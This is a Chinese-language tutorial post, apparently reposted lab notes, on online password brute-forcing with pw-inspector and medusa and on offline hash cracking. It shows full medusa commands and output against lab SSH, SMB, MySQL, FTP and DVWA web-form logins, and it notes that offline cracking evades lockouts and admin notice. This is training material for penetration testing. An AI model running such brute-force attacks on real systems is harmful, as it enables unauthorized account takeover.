当前位置: 首页 > 工具软件 > Medusa > 使用案例 >

在线密码破解-hydra、在线密码破解-medusa、离线密码破解

殷建弼
2023-12-01

在线密码破解-----hydra                                         

pw-inspector                                     

    - 按长度和字符集筛选字典                    

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u

密码破解效率                                 

    - 密码复杂度(字典命中率)              

    - 带宽、协议、服务器性能、客户端性能                        

    - 锁定阈值                                

    - 单位时间最大登陆请求次数

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

root@K:~# cat /usr/share/wordlists/nmap.lst

root@K:~# more p.lst

root@K:~# pw-inspector

PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:

  -i FILE    file to read passwords from (default: stdin)

  -o FILE    file to write valid passwords to (default: stdout)

  -m MINLEN  minimum length of a valid password

  -M MAXLEN  maximum length of a valid password

  -c MINSETS the minimum number of sets required (default: all given)

Sets:

  -l         lowcase characters (a,b,c,d, etc.)

  -u         upcase characters (A,B,C,D, etc.)

  -n         numbers (1,2,3,4, etc.)

  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)

  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.

The return code is the number of valid passwords found, 0 if none was found.

Use for security: check passwords, if 0 is returned, reject password choice.

Use for hacking: trim your dictionary file to the pw requirements of the target.

Usage only allowed for legal purposes.

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5

root@K:~# more p.lst

在线密码破解-----medusa                       

Hydra的缺点                                   

    - 稳定性差,程序时常崩溃                  

    - 速度控制不好,容易触发服务屏蔽或锁死机制

    - 每主机新建进程,每服务新建实例          

    - 大量目标破解时性能差                    

Medusa的特点                                  

    - 稳定性好                                

    - 速度控制得当                            

    - 基于线程                                

    - 支持模块少于hydra(不支持RDP )         

    - WEB-Form支持存在缺陷

root@k:~# medusa -h

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

medusa: option requires an argument -- 'h'

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]    : Target hostname or IP address

  -H [FILE]    : File containing target hostnames or IP addresses

  -u [TEXT]    : Username to test

  -U [FILE]    : File containing usernames to test

  -p [TEXT]    : Password to test

  -P [FILE]    : File containing passwords to test

  -C [FILE]    : File containing combo entries. See README for more information.

  -O [FILE]    : File to append log information to

  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]    : Name of the module to execute (without the .mod extension)

  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d           : Dump all known modules

  -n [NUM]     : Use for non-default TCP port number

  -s           : Enable SSL

  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]     : Total number of logins to be tested concurrently

  -T [NUM]     : Total number of hosts to be tested concurrently

  -L           : Parallelize logins using one username per thread. The default is to process 

                 the entire username before proceeding.

  -f           : Stop scanning host after first valid username/password found.

  -F           : Stop audit after first valid username/password found on any host.

  -b           : Suppress startup banner

  -q           : Display module's usage information

  -v [NUM]     : Verbose level [0 - 6 (more)]

  -w [NUM]     : Error debug level [0 - 10 (more)]

  -V           : Display version

  -Z [TEXT]    : Resume scan based on map of previous scan

oot@k:~# medusa -d

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  Available modules in "." :

  Available modules in "/usr/lib/medusa/modules" :

    + cvs.mod : Brute force module for CVS sessions : version 2.0

    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1

    + http.mod : Brute force module for HTTP : version 2.1

    + imap.mod : Brute force module for IMAP sessions : version 2.0

    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0

    + mysql.mod : Brute force module for MySQL sessions : version 2.0

    + nntp.mod : Brute force module for NNTP sessions : version 2.0

    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

    + pop3.mod : Brute force module for POP3 sessions : version 2.0

    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0

    + rexec.mod : Brute force module for REXEC sessions : version 2.0

    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

    + rsh.mod : Brute force module for RSH sessions : version 2.0

    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1

    + smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1

    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

    + snmp.mod : Brute force module for SNMP Community Strings : version 2.1

    + svn.mod : Brute force module for Subversion sessions : version 2.1

    + telnet.mod : Brute force module for telnet sessions : version 2.0

    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

    + vnc.mod : Brute force module for VNC sessions : version 2.1

    + web-form.mod : Brute force module for web forms : version 2.1

    + wrapper.mod : Generic Wrapper Module : version 2.0

在线密码破解-----medusa                              

medusa -d                                                

破解windows密码                                      

    - medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F

破解Linux SSH密码                                    

    - medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F     

其他服务密码破解                                 

    - medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F         

    - medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m           

      FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-       

      DATA:"post?user=username&pas=password&Login=Login"

msfadmin@metasploitable:~$ sudo passwd root

[sudo] password for msfadmin:

Enter new UNIX password:

Retype new UNIX password:

No password supplied

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst

root@K:~# grep 1234 /usr/share/wordlists/nmap.lst

root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v #

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v # > pass.lst

root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst

XP IP地址是192.168.1.118

C:\net user administrator zipper

root@K:~# medusa -M mebnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f

root@K:~# nmap P3306 192.168.1.113

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST

Nmap scan report for 192.168.1.113

Host is up (10.00036s latency).

PORT      STATE SERVOCE

3306/tcp  open  mysql

MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of  5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password:  [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of  5000 complete)

ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password:  [SUCCESS]

root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121

root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code  302

ACCOUNT XGWXK: [web-form] Host: 192.168.1.113 (1 of, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)

root@K:~# medusa -M web-form -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms

Available module options:

  USER-AGENT:?       User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".

  FORM:?             Target form to request. Default: "/"

  DENY-SIGNAL:?      Authentication failure message. Attempt flagged as successful if text is not present in

                     server response. Default: "Login incorrect"

  CUSTOM-HEADER:?    Custom HTTP header.

                     More headers can be defined by using this option several times.

  FORM-DATA:<METHOD>?<FIELDS>

                     Methods and fields to send to web service. Valid methods are GET and POST. The actual form

                     data to be submitted should also be defined here. Specifically, the fields: username and

                     password. The username field must be the first, followed by the password field.

                     Default: "post?username=&password="

Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"

                 -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"

在线密码破解-----medusa

    - -n : 非默认端口   

    - -s : 使用SSL连接  

    - -T : 并发主机数   

medusa -M ftp -q

root@k:~# medusa -M ftp -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ftp.mod (2.1) pMonkey <pmonkey@foofus.net> :: Brute force module for FTP/FTPS sessions

Available module options:

MODE:? (NORMAL*, EXPLICIT, IMPLICIT)

  EXPLICIT: AUTH TLS Mode as defined in RFC 4217

     Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to

     sending any credentials, however, an "AUTH TLS" command is issued and a

     SSL session is negotiated.

  IMPLICIT: FTP over SSL (990/tcp)

     Implicit FTPS requires a SSL handshake to be performed before any FTP

     commands are sent. This service typically resides on tcp/990. If the user

     specifies this option or uses the "-n" (SSL) option, the module will

     default to this mode and tcp/990.

  NORMAL

     The default behaviour if no MODE is specified. Authentication is attempted

     in the clear. If the server requests encryption for the given user,

     Explicit FTPS is utilized.

Example Usage:

    medusa -M ftp -h host -u username -p password

    medusa -M ftp -s -h host -u username -p password

    medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password

(*) Default value

离线密码破解                                   

身份认证                          

    - 禁止明文传输密码                                                

    - 每次认证使用HASH算法加密密码传输)(HASH算法加密容易、解密困难)

    - 服务器端用户数据库应加盐加密保存                                

破解思路                                                              

    - 嗅探获取密码HASH                                                

    - 利用漏洞登录服务器并从用户数据库获取密码HASH                    

    - 识别HASH类型                    

      长度、字符集         

    - 利用李璇破解工具碰撞密码HASH

离线密码破解                                

优势                                        

    - 离线不会触发密码锁定机制              

    - 不会产生大量登录失败日志引起管理员注意

HASH识别工具                                

    - hash-identifier                       

    - Hashid                                

    - 可能识别错误或无法识别

火狐插件hashr

 

学习参考资料>>>> 传送门

转载于:https://my.oschina.net/u/3318205/blog/1864969

 类似资料: